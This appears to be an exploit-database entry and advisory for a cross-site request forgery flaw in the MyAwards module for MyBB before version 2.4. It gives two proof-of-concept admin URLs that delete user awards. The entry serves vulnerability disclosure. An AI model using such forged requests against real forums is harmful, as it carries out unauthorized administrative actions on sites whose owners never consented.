MyAwards MyBB Module - Cross-Site Request Forgery

Author: Vagineer
type: webapps
platform: php
port: 
date_added: 2014-08-22 
date_updated: 2016-01-22 
verified: 1 
codes: OSVDB-110438 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/69386/info

MyAwards module for MyBB is prone to a cross-site request-forgery vulnerability.

An attacker may exploit this issue to perform certain unauthorized actions. This may lead to further attacks.

Versions prior to MyAwards 2.4 are vulnerable.

https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1